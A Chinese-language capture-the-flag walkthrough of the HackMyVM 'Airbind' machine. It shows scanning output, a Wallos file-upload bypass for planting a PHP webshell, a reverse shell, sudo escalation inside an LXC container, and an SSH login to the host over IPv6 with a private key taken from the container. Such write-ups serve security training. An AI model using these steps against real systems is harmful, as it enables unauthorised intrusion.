HackMyVM-Airbind-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.183  08:00:27:a6:8e:72       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ef:e0:77       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.031 seconds (126.05 hosts/sec). 4 responded
❯ export ip=192.168.60.183
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.183:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 15:02 CST
Initiating ARP Ping Scan at 15:02
Scanning 192.168.60.183 [1 port]
Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:02
Scanning 192.168.60.183 [1 port]
Discovered open port 80/tcp on 192.168.60.183
Completed SYN Stealth Scan at 15:02, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.183
Host is up, received arp-response (0.0012s latency).
Scanned at 2025-05-15 15:02:13 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63
MAC Address: 08:00:27:A6:8E:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 2 (72B) | Rcvd: 5 (798B)

没有开放22端口，只有80端口

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.183
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 1924]
/images               (Status: 301) [Size: 317] [--> http://192.168.60.183/images/]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/logos.php            (Status: 200) [Size: 1977]
/stats.php            (Status: 302) [Size: 0] [--> login.php]
/screenshots          (Status: 301) [Size: 322] [--> http://192.168.60.183/screenshots/]
/scripts              (Status: 301) [Size: 318] [--> http://192.168.60.183/scripts/]
/registration.php     (Status: 302) [Size: 0] [--> login.php]
/includes             (Status: 301) [Size: 319] [--> http://192.168.60.183/includes/]
/db                   (Status: 301) [Size: 313] [--> http://192.168.60.183/db/]
/logout.php           (Status: 302) [Size: 0] [--> .]
/styles               (Status: 301) [Size: 317] [--> http://192.168.60.183/styles/]
/settings.php         (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/libs                 (Status: 301) [Size: 315] [--> http://192.168.60.183/libs/]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

POC 利用

浏览器访问一下，有个登录表单，尝试用弱密码admin:admin登录

得知版本为Wallos v1.11.0

google搜寻相关版本漏洞

存在文件上传漏洞Wallos < 1.11.2 - File Upload RCE - PHP webapps Exploit

可以通过增加订阅的方式来上传webshell

修改Content-Type为image/jpeg

并且在内容开头添加GIF89a;

访问/images/uploads/logos/目录下的php文件，上传后会自动重命名

用户提权

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from ubuntu-192.168.60.183-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/ubuntu~192.168.60.183_Linux_x86_64/2025_05_15-15_22_34-286.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@ubuntu:/$

通过信息收集得知存在lxc容器环境中

www-data@ubuntu:/tmp$ hostname -I
10.0.3.241

并且用户拥有sudo权限可以执行任何操作

www-data@ubuntu:/tmp$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

切换到root根目录中得到user flag

www-data@ubuntu:/tmp$ sudo su
root@ubuntu:/tmp# cd ~
root@ubuntu:~# ls -al
total 40
drwx------  4 root root 4096 May 21  2024 .
drwxr-xr-x 17 root root 4096 May 15 06:52 ..
lrwxrwxrwx  1 root root    9 Apr  2  2024 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 17  2022 .bashrc
-rw-------  1 root root   20 May 21  2024 .lesshst
drwxr-xr-x  3 root root 4096 Apr  1  2024 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   66 May 21  2024 .selected_editor
-rw-------  1 root root  300 May 21  2024 .sqlite_history
drwx------  2 root root 4096 Apr  2  2024 .ssh
-rwx------  1 root root   33 Apr  2  2024 user.txt
-rw-------  1 root root    0 May 21  2024 .wpa_cli_history
root@ubuntu:~# cat user.txt
4408f370877687429c6ab332e6f560d0

Root提权

尝试探测宿主机的ip及有关端口信息

靶机中另外还开放了53端口

root@ubuntu:/tmp# ./fscan -h 10.0.3.1/24  -p 0-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] CIDR范围: 10.0.3.0-10.0.3.255
[*] 已生成IP范围: 10.0.3.0 - 10.0.3.255
[*] 已解析CIDR 10.0.3.1/24 -> IP范围 10.0.3.0-10.0.3.255
[*] 最终有效主机数量: 256
[+] 目标 10.0.3.1        存活 (ICMP)
[+] 目标 10.0.3.241      存活 (ICMP)
[+] ICMP存活主机数量: 2
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 10.0.3.241:80
[+] 端口开放 10.0.3.1:53
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.0.3.241         状态码:302 长度:0      标题:无标题  重定向地址: http://10.0.3.241/login.php
[*] 网站标题 http://10.0.3.241/login.php 状态码:200 长度:1924   标题:Wallos - Subscription Tracker
[!] 扫描错误 10.0.3.1:53 - Get "http://10.0.3.1:53": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 15.952480273s

并且在root家目录中存在.ssh文件，存在私钥

不过靶机并没有开放22端口

无路可走之下尝试扫一下IPV6

得到靶机ipv6地址为fe80::a00:27ff:fea6:8e72

❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from fe80::a00:27ff:fea6:8e72%eth0: icmp_seq=1 ttl=64 time=0.726 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from fe80::a00:27ff:fea6:8e72%eth0: icmp_seq=2 ttl=64 time=0.989 ms
^C
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 1040ms
rtt min/avg/max/mdev = 0.027/0.442/0.989/0.425 ms
❯ nmap -6 fe80::a00:27ff:fea6:8e72%eth0 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 16:07 CST
Nmap scan report for fe80::a00:27ff:fea6:8e72
Host is up (0.0018s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:A6:8E:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.53 seconds

22端口开放，尝试利用容器中的私钥进行登录

我直接在容器内登录了，容器内的宿主机ipv6为fe80::216:3eff:fe00:0%eth0

root@ubuntu:~# ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1(ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::dea1:f7ff:fe82:7613%eth0: icmp_seq=1 ttl=64 time=0.058 ms
64 bytes from fe80::216:3eff:fe00:0%eth0: icmp_seq=1 ttl=64 time=0.077 ms
64 bytes from fe80::dea1:f7ff:fe82:7613%eth0: icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from fe80::216:3eff:fe00:0%eth0: icmp_seq=2 ttl=64 time=0.052 ms
^C
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.036/0.055/0.077/0.014 ms
root@ubuntu:~# ip a|grep inet6 |awk '{print $2}'
::1/128
fe80::dea1:f7ff:fe82:7613/64
root@ubuntu:~# ssh root@fe80::216:3eff:fe00:0%eth0
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# cat root.txt
2bd693135712f88726c22770278a2dcf